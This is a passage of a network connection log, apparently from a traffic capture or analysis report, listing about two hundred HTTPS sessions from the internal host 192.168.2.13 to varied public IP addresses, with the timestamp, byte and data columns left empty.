                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13455192.168.2.134736852.104.152.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13456192.168.2.1334220132.17.137.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13457192.168.2.135547046.92.155.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13458192.168.2.1344994223.146.150.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13459192.168.2.1359910175.87.8.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13460192.168.2.1339560188.102.178.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13461192.168.2.1337590206.47.184.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13462192.168.2.1348176211.202.55.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13463192.168.2.134639442.139.232.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13464192.168.2.133786836.154.63.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13465192.168.2.134484463.65.30.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13466192.168.2.1334048171.128.156.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13467192.168.2.133889062.94.202.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13468192.168.2.134947084.245.24.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13469192.168.2.1344060131.184.116.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13470192.168.2.1339246201.183.251.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13471192.168.2.1345300194.173.22.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13472192.168.2.1352006129.90.72.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13473192.168.2.133376844.17.70.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13474192.168.2.135799280.169.238.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13475192.168.2.1360942221.77.14.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13476192.168.2.1333334152.6.15.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13477192.168.2.1333532191.170.122.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13478192.168.2.1334792164.133.119.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13479192.168.2.1347806203.19.203.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13480192.168.2.1356116118.230.21.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13481192.168.2.1347368115.69.59.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13482192.168.2.1338434159.125.45.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13483192.168.2.135658881.219.20.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13484192.168.2.134352888.205.250.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13485192.168.2.135498898.208.215.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13486192.168.2.1335610153.26.101.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13487192.168.2.134143277.252.222.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13488192.168.2.134501481.191.9.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13489192.168.2.135437088.128.122.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13490192.168.2.1359660178.139.176.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13491192.168.2.1344542139.38.221.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13492192.168.2.134641497.179.115.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13493192.168.2.1336770191.44.204.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13494192.168.2.134919839.6.89.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13495192.168.2.1359614151.147.73.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13496192.168.2.135822657.217.208.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13497192.168.2.134134885.154.237.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13498192.168.2.1346644124.158.252.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13499192.168.2.133333825.206.250.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13500192.168.2.13466189.247.24.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13501192.168.2.135473445.37.107.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13502192.168.2.1335794210.214.128.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13503192.168.2.1352564164.89.41.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13504192.168.2.135028638.44.182.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13505192.168.2.1334152172.107.20.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13506192.168.2.1356706160.132.124.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13507192.168.2.1353560102.243.92.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13508192.168.2.1333240172.236.19.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13509192.168.2.1354544116.174.199.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13510192.168.2.1345542200.62.178.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13511192.168.2.1343616188.84.172.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13512192.168.2.1338984207.217.223.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13513192.168.2.1336250185.206.165.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13514192.168.2.135991097.140.42.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13515192.168.2.1338822129.58.189.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13516192.168.2.1356170116.211.91.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13517192.168.2.1350372177.101.199.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13518192.168.2.1348908150.65.42.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13519192.168.2.1352396195.35.110.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13520192.168.2.1357146222.92.44.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13521192.168.2.135838653.82.106.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13522192.168.2.1358690143.232.224.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13523192.168.2.1338164181.205.127.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13524192.168.2.133613446.167.220.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13525192.168.2.133698624.63.117.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13526192.168.2.1356082203.85.45.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13527192.168.2.1358198192.230.211.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13528192.168.2.134745893.167.31.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13529192.168.2.135072463.9.67.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13530192.168.2.134101461.229.166.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13531192.168.2.1349990177.247.60.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13532192.168.2.13494808.99.155.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13533192.168.2.1359606133.206.110.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13534192.168.2.1355978223.178.51.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13535192.168.2.134057442.36.119.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13536192.168.2.1359074189.42.170.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13537192.168.2.135086277.148.52.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13538192.168.2.1335844191.38.44.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13539192.168.2.1344480197.107.76.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13540192.168.2.134357637.218.100.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13541192.168.2.1351714191.209.254.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13542192.168.2.1345746197.169.158.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13543192.168.2.1359500119.23.177.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13544192.168.2.134101861.118.233.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13545192.168.2.135016468.81.210.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13546192.168.2.134313218.156.102.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13547192.168.2.1351028132.77.128.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13548192.168.2.1354650180.115.140.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13549192.168.2.135835645.178.213.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13550192.168.2.1354710116.225.99.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13551192.168.2.133366468.81.172.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13552192.168.2.1333574119.150.109.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13553192.168.2.1333690112.169.238.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13554192.168.2.133971880.106.123.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13555192.168.2.1353948122.136.63.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13556192.168.2.1338664165.164.142.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13557192.168.2.134846072.231.226.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13558192.168.2.134504684.145.120.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13559192.168.2.1334362135.84.227.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13560192.168.2.1356782201.238.39.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13561192.168.2.1342314188.98.89.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13562192.168.2.134526041.113.247.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13563192.168.2.1343926152.111.170.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13564192.168.2.1339164123.100.31.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13565192.168.2.1360066210.212.245.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13566192.168.2.1349378123.157.44.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13567192.168.2.1348788131.19.188.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13568192.168.2.135953023.67.101.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13569192.168.2.1360122144.86.140.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13570192.168.2.13429689.127.82.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13571192.168.2.1341738131.92.92.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13572192.168.2.133397268.123.185.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13573192.168.2.133639619.40.186.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13574192.168.2.1357566206.230.231.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13575192.168.2.1356766174.198.20.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13576192.168.2.1353120154.30.199.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13577192.168.2.1334616143.187.38.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13578192.168.2.1353448173.183.187.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13579192.168.2.133617432.172.109.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13580192.168.2.134912027.29.65.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13581192.168.2.1356160191.17.53.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13582192.168.2.1336622175.43.185.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13583192.168.2.1339880109.192.177.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13584192.168.2.135639878.127.121.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13585192.168.2.1333366111.45.235.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13586192.168.2.1341792148.148.163.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13587192.168.2.135170854.135.208.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13588192.168.2.1347172134.66.39.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13589192.168.2.1340836165.80.168.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13590192.168.2.135286268.9.218.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13591192.168.2.1356770155.180.123.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13592192.168.2.1358034160.151.87.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13593192.168.2.1359538173.65.208.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13594192.168.2.1340966147.33.76.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13595192.168.2.1358412114.187.57.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13596192.168.2.1333414171.248.170.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13597192.168.2.135770494.43.87.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13598192.168.2.133344649.163.249.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13599192.168.2.134006427.112.7.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13600192.168.2.135209252.31.167.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13601192.168.2.1333970159.194.231.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13602192.168.2.1343062105.187.196.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13603192.168.2.1350568163.179.254.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13604192.168.2.135753671.40.85.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13605192.168.2.13409021.95.60.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13606192.168.2.1357198149.114.23.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13607192.168.2.1338848108.218.184.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13608192.168.2.1355526176.226.193.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13609192.168.2.135448837.89.229.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13610192.168.2.1352314110.229.174.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13611192.168.2.1347302135.205.188.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13612192.168.2.1345372210.61.73.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13613192.168.2.1360884150.87.25.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13614192.168.2.1355950146.3.194.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13615192.168.2.1352026217.106.33.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13616192.168.2.135131876.233.11.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13617192.168.2.133583246.90.142.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13618192.168.2.133335467.201.128.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13619192.168.2.1359828211.191.16.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13620192.168.2.1336766181.243.67.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13621192.168.2.134576270.98.15.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13622192.168.2.135596477.218.165.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13623192.168.2.1338914175.249.187.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13624192.168.2.134150648.95.15.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13625192.168.2.135090671.61.154.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13626192.168.2.1351272165.245.173.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13627192.168.2.1337798218.114.119.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13628192.168.2.1334202199.55.133.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13629192.168.2.1355322137.3.200.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13630192.168.2.1353392149.177.145.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13631192.168.2.1360346139.207.94.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13632192.168.2.135954465.127.7.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13633192.168.2.1334422223.136.234.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13634192.168.2.1337134141.47.18.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13635192.168.2.1340408198.175.159.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13636192.168.2.1357602149.160.223.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13637192.168.2.1349786177.87.100.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13638192.168.2.1347402166.181.234.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13639192.168.2.1349618121.36.164.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13640192.168.2.1343162172.43.113.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13641192.168.2.1338754196.201.209.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13642192.168.2.1345838153.5.70.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13643192.168.2.135616840.73.27.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13644192.168.2.1347326173.3.87.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13645192.168.2.135639047.119.55.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13646192.168.2.135097298.213.200.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13647192.168.2.134708247.84.10.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13648192.168.2.1346580191.54.32.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13649192.168.2.1337736213.116.71.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13650192.168.2.134304839.97.122.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13651192.168.2.1342320174.221.130.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13652192.168.2.1345252142.24.111.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13653192.168.2.1342008187.90.90.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13654192.168.2.1355490170.214.203.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13655192.168.2.1335478105.240.115.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13656192.168.2.134139664.38.225.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13657192.168.2.1332908177.67.135.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13658192.168.2.136010425.178.166.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13659192.168.2.1340432141.229.107.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13660192.168.2.1338272204.63.73.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13661192.168.2.1348650144.161.220.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13662192.168.2.1335086217.26.1.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13663192.168.2.135386090.68.55.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13664192.168.2.135522861.77.129.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13665192.168.2.1337918207.195.27.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13666192.168.2.1352392101.220.249.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13667192.168.2.1335678216.222.77.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13668192.168.2.133368031.213.152.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13669192.168.2.1352738178.27.190.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13670192.168.2.1356596174.86.197.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13671192.168.2.1336814102.159.94.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13672192.168.2.1338528143.192.41.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13673192.168.2.1359914180.184.64.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13674192.168.2.134273453.188.230.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13675192.168.2.1354138161.148.40.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13676192.168.2.1359710184.157.203.120443
